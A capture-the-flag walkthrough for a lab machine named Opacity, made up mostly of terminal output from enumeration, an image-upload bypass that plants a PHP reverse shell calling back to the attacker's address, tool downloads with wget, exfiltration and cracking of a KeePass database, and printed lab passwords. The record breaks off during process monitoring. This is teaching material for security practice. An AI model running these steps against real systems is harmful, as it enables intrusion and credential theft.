Opacity
Last updated
Was this helpful?
Last updated
Was this helpful?
Start Machine
Opacity is an easy machine that can help you in the penetration testing learning process.
There are 2 hash keys located on the machine (user - local.txt and root - proof.txt). Can you find them and become root?
Hint: There are several ways to perform an action; always analyze the behavior of the application.
Answer the questions below
┌──(witty㉿kali)-[~/Downloads]
└─$ rustscan -a 10.10.142.194 --ulimit 5500 -b 65535 -- -A -Pn
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢
[~] The config file is expected to be at "/home/witty/.rustscan.toml"
[~] Automatically increasing ulimit value to 5500.
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
Open 10.10.142.194:22
Open 10.10.142.194:80
Open 10.10.142.194:139
Open 10.10.142.194:445
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-09 18:49 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:49
Completed NSE at 18:49, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:49
Completed NSE at 18:49, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:49
Completed NSE at 18:49, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 18:49
Completed Parallel DNS resolution of 1 host. at 18:49, 0.02s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 18:49
Scanning 10.10.142.194 [4 ports]
Discovered open port 139/tcp on 10.10.142.194
Discovered open port 445/tcp on 10.10.142.194
Discovered open port 80/tcp on 10.10.142.194
Discovered open port 22/tcp on 10.10.142.194
Completed Connect Scan at 18:49, 0.32s elapsed (4 total ports)
Initiating Service scan at 18:49
Scanning 4 services on 10.10.142.194
Completed Service scan at 18:49, 12.22s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.142.194.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:49
Completed NSE at 18:50, 10.03s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 1.53s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
Nmap scan report for 10.10.142.194
Host is up, received user-set (0.32s latency).
Scanned at 2023-04-09 18:49:40 EDT for 25s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 0fee2910d98e8c53e64de3670c6ebee3 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCa4rFv9bD2hlJ8EgxU6clOj6v7GMUIjfAr7fzckrKGPnvxQA3ikvRKouMMUiYThvvfM7gOORL5sicN3qHS8cmRsLFjQVGyNL6/nb+MyfUJlUYk4WGJYXekoP5CLhwGqH/yKDXzdm1g8LR6afYw8fSehE7FM9AvXMXqvj+/WoC209pWu/s5uy31nBDYYfRP8VG3YEJqMTBgYQIk1RD+Q6qZya1RQDnQx6qLy1jkbrgRU9mnfhizLVsqZyXuoEYdnpGn9ogXi5A0McDmJF3hh0p01+KF2/+GbKjJrGNylgYtU1/W+WAoFSPE41VF7NSXbDRba0WIH5RmS0MDDFTy9tbKB33sG9Ct6bHbpZCFnxBi3toM3oBKYVDfbpbDJr9/zEI1R9ToU7t+RH6V0zrljb/cONTQCANYxESHWVD+zH/yZGO4RwDCou/ytSYCrnjZ6jHjJ9TWVkRpVjR7VAV8BnsS6egCYBOJqybxW2moY86PJLBVkd6r7x4nm19yX4AQPm8=
| 256 9542cdfc712799392d0049ad1be4cf0e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAqe7rEbmvlsedJwYaZCIdligUJewXWs8mOjEKjVrrY/28XqW/RMZ12+4wJRL3mTaVJ/ftI6Tu9uMbgHs21itQQ=
| 256 edfe9c94ca9c086ff25ca6cf4d3c8e5b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINQSFcnxA8EchrkX6O0RPMOjIUZyyyQT9fM4z4DdCZyA
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: Login
|_Requested resource was login.php
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
139/tcp open netbios-ssn syn-ack Samba smbd 4.6.2
445/tcp open netbios-ssn syn-ack Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: -1s
| nbstat: NetBIOS name: OPACITY, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| Names:
| OPACITY<00> Flags: <unique><active>
| OPACITY<03> Flags: <unique><active>
| OPACITY<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 0000000000000000000000000000000000
| 0000000000000000000000000000000000
|_ 0000000000000000000000000000
| smb2-time:
| date: 2023-04-09T22:49:54
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 31044/tcp): CLEAN (Couldn't connect)
| Check 2 (port 35765/tcp): CLEAN (Couldn't connect)
| Check 3 (port 56906/udp): CLEAN (Failed to receive data)
| Check 4 (port 4711/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.73 seconds
┌──(witty㉿kali)-[~/Downloads]
└─$ gobuster -t 64 dir -e -k -u http://10.10.142.194 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.142.194
[+] Method: GET
[+] Threads: 64
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2023/04/09 19:15:25 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.142.194/css (Status: 301) [Size: 312] [--> http://10.10.142.194/css/]
http://10.10.142.194/cloud (Status: 301) [Size: 314] [--> http://10.10.142.194/cloud/]
http://10.10.142.194/server-status (Status: 403) [Size: 278]
Progress: 181040 / 220561 (82.08%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2023/04/09 19:25:05 Finished
===============================================================
┌──(witty㉿kali)-[~/Downloads]
└─$ smbmap -u anonymous -H 10.10.142.194
[+] Guest session IP: 10.10.142.194:445 Name: 10.10.142.194
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
IPC$ NO ACCESS IPC Service (opacity server (Samba, Ubuntu))
┌──(witty㉿kali)-[~/Downloads]
└─$ enum4linux -a 10.10.142.194
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Apr 9 19:03:57 2023
=========================================( Target Information )=========================================
Target ........... 10.10.142.194
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 10.10.142.194 )===========================
[+] Got domain/workgroup name: WORKGROUP
===============================( Nbtstat Information for 10.10.142.194 )===============================
Looking up status of 10.10.142.194
OPACITY <00> - B <ACTIVE> Workstation Service
OPACITY <03> - B <ACTIVE> Messenger Service
OPACITY <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
===================================( Session Check on 10.10.142.194 )===================================
[+] Server 10.10.142.194 allows sessions using username '', password ''
================================( Getting domain SID for 10.10.142.194 )================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==================================( OS information on 10.10.142.194 )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.10.142.194 from srvinfo:
OPACITY Wk Sv PrQ Unx NT SNT opacity server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
=======================================( Users on 10.10.142.194 )=======================================
Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.
Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.
=================================( Share Enumeration on 10.10.142.194 )=================================
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (opacity server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.142.194
//10.10.142.194/print$ Mapping: DENIED Listing: N/A Writing: N/A
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//10.10.142.194/IPC$ Mapping: N/A Listing: N/A Writing: N/A
===========================( Password Policy Information for 10.10.142.194 )===========================
[+] Attaching to 10.10.142.194 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] OPACITY
[+] Builtin
[+] Password Info for Domain: OPACITY
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
======================================( Groups on 10.10.142.194 )======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
==================( Users on 10.10.142.194 via RID cycling (RIDS: 500-550,1000-1050) )==================
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\sysadmin (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-5-21-1327801453-43412457-3647261475 and logon username '', password ''
S-1-5-21-1327801453-43412457-3647261475-501 OPACITY\nobody (Local User)
S-1-5-21-1327801453-43412457-3647261475-513 OPACITY\None (Domain Group)
===============================( Getting printer info for 10.10.142.194 )===============================
No printers returned.
enum4linux complete on Sun Apr 9 19:19:44 2023
┌──(witty㉿kali)-[~/Downloads]
└─$ file filekoth
filekoth: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1350x900, components 3
┌──(witty㉿kali)-[~/Downloads]
└─$ python3 -m http.server 1234
Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...
Request:
POST /cloud/ HTTP/1.1
Host: 10.10.142.194
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Origin: http://10.10.142.194
Connection: close
Referer: http://10.10.142.194/cloud/
Cookie: PHPSESSID=.....
Upgrade-Insecure-Requests: 1
url=http%3A%2F%2F10.8.19.103%3A1234%2Ffilekoth
Response:
HTTP/1.1 200 OK
revshell
┌──(witty㉿kali)-[~/Downloads]
└─$ tail payload_ivan.php
}
echo '<pre>';
// change the host address and/or port number as necessary
$sh = new Shell('10.8.19.103', 1337);
$sh->run();
unset($sh);
// garbage collector requires PHP v5.3.0 or greater
// @gc_collect_cycles();
echo '</pre>';
?>
http://10.8.19.103:1234/payload_ivan.php#filehoth.jpg
┌──(witty㉿kali)-[~/Downloads]
└─$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.8.19.103] from (UNKNOWN) [10.10.142.194] 39452
SOCKET: Shell has connected! PID: 2880
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@opacity:/var/www/html/cloud/images$ ls
ls
www-data@opacity:/var/www/html/cloud/images$ cd ..
cd ..
www-data@opacity:/var/www/html/cloud$ ls
ls
folder.png images index.php load.gif storage.php style.css
www-data@opacity:/var/www/html/cloud$ cd ..
cd ..
www-data@opacity:/var/www/html$ ls
ls
cloud css index.php login.php logout.php
www-data@opacity:/var/www/html$ cat login.php
cat login.php
<?php session_start(); /* Starts the session */
/* Check Login form submitted */
if(isset($_POST['Submit'])){
/* Define username and associated password array */
$logins = array('admin' => 'oncloud9','root' => 'oncloud9','administrator' => 'oncloud9');
/* Check and assign submitted Username and Password to new variable */
$Username = isset($_POST['Username']) ? $_POST['Username'] : '';
$Password = isset($_POST['Password']) ? $_POST['Password'] : '';
/* Check Username and Password existence in defined array */
if (isset($logins[$Username]) && $logins[$Username] == $Password){
/* Success: Set session variables and redirect to Protected page */
$_SESSION['UserData']['Username']=$logins[$Username];
header("location:index.php");
exit;
} else {
/*Unsuccessful attempt: Set error message */
$msg="<span style='color:red'>Invalid Login Details</span>";
}
}
?>
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Login</title>
<link href="./css/style.css" rel="stylesheet">
</head>
<body>
<br>
<form align="center" action="" method="post" name="Login_Form">
<table width="400" border="0" align="center" cellpadding="5" cellspacing="1" class="Table">
<?php if(isset($msg)){?>
<tr>
<td colspan="2" align="center" valign="top"><?php echo $msg;?></td>
</tr>
<?php } ?>
<tr>
<td colspan="2" align="left" valign="top"><h3>Login</h3></td>
</tr>
<tr>
<td align="right" valign="top">Username</td>
<td><input name="Username" type="text" class="Input"></td>
</tr>
<tr>
<td align="right">Password</td>
<td><input name="Password" type="password" class="Input"></td>
</tr>
<tr>
<td> </td>
<td><input name="Submit" type="submit" value="Login" class="Button3"></td>
</tr>
</table>
</form>
</body>
</html>
administrator:oncloud9
www-data@opacity:/var$ cd backups
cd backups
www-data@opacity:/var/backups$ ls
ls
apt.extended_states.0 apt.extended_states.1.gz backup.zip
www-data@opacity:/var/backups$ unzip backup.zip
unzip backup.zip
Archive: backup.zip
checkdir error: cannot create lib
Permission denied
unable to process lib/.
error: cannot create script.php
Permission denied
www-data@opacity:/home/sysadmin/scripts/lib$ cat backup.inc.php
cat backup.inc.php
<?php
ini_set('max_execution_time', 600);
ini_set('memory_limit', '1024M');
function zipData($source, $destination) {
if (extension_loaded('zip')) {
if (file_exists($source)) {
$zip = new ZipArchive();
if ($zip->open($destination, ZIPARCHIVE::CREATE)) {
$source = realpath($source);
if (is_dir($source)) {
$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST);
foreach ($files as $file) {
$file = realpath($file);
if (is_dir($file)) {
$zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
} else if (is_file($file)) {
$zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
}
}
} else if (is_file($source)) {
$zip->addFromString(basename($source), file_get_contents($source));
}
}
return $zip->close();
}
}
return false;
}
?>
uhmm
uploading linpeas.sh
www-data@opacity:/opt$ cd /tmp
cd /tmp
www-data@opacity:/tmp$ wget http://10.8.19.103:1234/linpeas.sh
wget http://10.8.19.103:1234/linpeas.sh
--2023-04-09 23:49:54-- http://10.8.19.103:1234/linpeas.sh
Connecting to 10.8.19.103:1234... connected.
HTTP request sent, awaiting response... 200 OK
Length: 828098 (809K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[===================>] 808.69K 374KB/s in 2.2s
2023-04-09 23:49:57 (374 KB/s) - ‘linpeas.sh’ saved [828098/828098]
www-data@opacity:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@opacity:/tmp$ ./linpeas.sh
./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
╔══════════╣ Analyzing Keepass Files (limit 70)
-rwxrwxr-x 1 sysadmin sysadmin 1566 Jul 8 2022 /opt/dataset.kdbx
www-data@opacity:/tmp$ cd /opt
cd /opt
www-data@opacity:/opt$ ls
ls
dataset.kdbx
www-data@opacity:/opt$ file dataset.kdbx
file dataset.kdbx
dataset.kdbx: Keepass password database 2.x KDBX
www-data@opacity:/opt$ python3 -m http.server
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.8.19.103 - - [10/Apr/2023 00:16:32] "GET /dataset.kdbx HTTP/1.1" 200 -
┌──(witty㉿kali)-[~/Downloads]
└─$ wget http://10.10.142.194:8000/dataset.kdbx
--2023-04-09 20:16:31-- http://10.10.142.194:8000/dataset.kdbx
Connecting to 10.10.142.194:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1566 (1.5K) [application/octet-stream]
Saving to: ‘dataset.kdbx’
dataset.kdbx 100%[====================>] 1.53K --.-KB/s in 0s
2023-04-09 20:16:32 (20.9 MB/s) - ‘dataset.kdbx’ saved [1566/1566]
https://www.thedutchhacker.com/how-to-crack-a-keepass-database-file/
┌──(witty㉿kali)-[~/Downloads]
└─$ keepass2john dataset.kdbx > hash_opacity
┌──(witty㉿kali)-[~/Downloads]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash_opacity
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 100000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
741852963 (dataset)
1g 0:00:00:18 DONE (2023-04-09 20:18) 0.05491g/s 48.32p/s 48.32c/s 48.32C/s chichi..david1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(witty㉿kali)-[~/Downloads]
└─$ sudo apt -y install keepassx
open database and enter the pass then unlock it
sysadmin:Cl0udP4ss40p4city#8700
┌──(witty㉿kali)-[~/Downloads]
└─$ ssh sysadmin@10.10.142.194
The authenticity of host '10.10.142.194 (10.10.142.194)' can't be established.
ED25519 key fingerprint is SHA256:VdW4fa9h5tyPlpiJ8i9kyr+MCvLbz7p4RgOGPbWM7Nw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.142.194' (ED25519) to the list of known hosts.
sysadmin@10.10.142.194's password:
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-139-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 10 Apr 2023 12:26:00 AM UTC
System load: 0.54 Processes: 129
Usage of /: 57.5% of 8.87GB Users logged in: 0
Memory usage: 45% IPv4 address for eth0: 10.10.142.194
Swap usage: 0%
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
* Introducing Expanded Security Maintenance for Applications.
Receive updates to over 25,000 software packages with your
Ubuntu Pro subscription. Free for personal use.
https://ubuntu.com/pro
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Wed Feb 22 08:13:43 2023 from 10.0.2.15
sysadmin@opacity:~$ pwd
/home/sysadmin
sysadmin@opacity:~$ ls
local.txt scripts
sysadmin@opacity:~$ cat local.txt
6661b61b44d234d230d06bf5b3c075e2
sysadmin@opacity:/tmp$ wget http://10.8.19.103:1234/pspy64
--2023-04-10 00:28:51-- http://10.8.19.103:1234/pspy64
Connecting to 10.8.19.103:1234... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’
pspy64 100%[====================>] 2.96M 1.12MB/s in 2.6s
2023-04-10 00:28:54 (1.12 MB/s) - ‘pspy64’ saved [3104768/3104768]
sysadmin@opacity:/tmp$ chmod +x pspy64
sysadmin@opacity:/tmp$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2023/04/10 00:29:16 CMD: UID=1000 PID=27648 | ./pspy64
2023/04/10 00:29:16 CMD: UID=0 PID=27647 |
2023/04/10 00:29:16 CMD: UID=0 PID=27646 |
2023/04/10 00:29:16 CMD: UID=1000 PID=27610 | -bash
2023/04/10 00:29:16 CMD: UID=1000 PID=27609 | sshd: sysadmin@pts/1
2023/04/10 00:29:16 CMD: UID=1000 PID=27477 | (sd-pam)
2023/04/10 00:29:16 CMD: UID=0 PID=27476 |
2023/04/10 00:29:16 CMD: UID=1000 PID=27475 | /lib/systemd/systemd --user
2023/04/10 00:29:16 CMD: UID=0 PID=27462 | sshd: sysadmin [priv]
2023/04/10 00:29:16 CMD: UID=33 PID=27420 | python3 -m http.server
2023/04/10 00:29:16 CMD: UID=0 PID=27409 |
2023/04/10 00:29:16 CMD: UID=0 PID=26946 |
2023/04/10 00:29:16 CMD: UID=0 PID=26444 |
2023/04/10 00:29:16 CMD: UID=33 PID=13311 | /usr/sbin/apache2 -k start
2023/04/10 00:29:16 CMD: UID=33 PID=13310 | /usr/sbin/apache2 -k start
2023/04/10 00:29:16 CMD: UID=33 PID=13309 | /usr/sbin/apache2 -k start
2023/04/10 00:29:16 CMD: UID=33 PID=13305 | /usr/sbin/apache2 -k start
2023/04/10 00:29:16 CMD: UID=33 PID=13304 | /usr/sbin/apache2 -k start
2023/04/10 00:29:16 CMD: UID=33 PID=2886 | /bin/bash
2023/04/10 00:29:16 CMD: UID=33 PID=2885 | python3 -c import pty;pty.spawn("/bin/bash")
2023/04/10 00:29:16 CMD: UID=33 PID=2881 | sh
2023/04/10 00:29:16 CMD: UID=33 PID=2880 | sh -c sh
2023/04/10 00:29:16 CMD: UID=0 PID=2725 |
2023/04/10 00:29:16 CMD: UID=33 PID=2291 | /usr/sbin/apache2 -k start
2023/04/10 00:29:16 CMD: UID=0 PID=890 | /usr/sbin/smbd --foreground --no-process-group
2023/04/10 00:29:16 CMD: UID=0 PID=877 | /usr/sbin/smbd --foreground --no-process-group
2023/04/10 00:29:16 CMD: UID=0 PID=876 | /usr/sbin/smbd --foreground --no-process-group
2023/04/10 00:29:16 CMD: UID=0 PID=807 | /usr/sbin/smbd --foreground --no-process-group
2023/04/10 00:29:16 CMD: UID=33 PID=801 | php-fpm: pool www
2023/04/10 00:29:16 CMD: UID=33 PID=800 | php-fpm: pool www
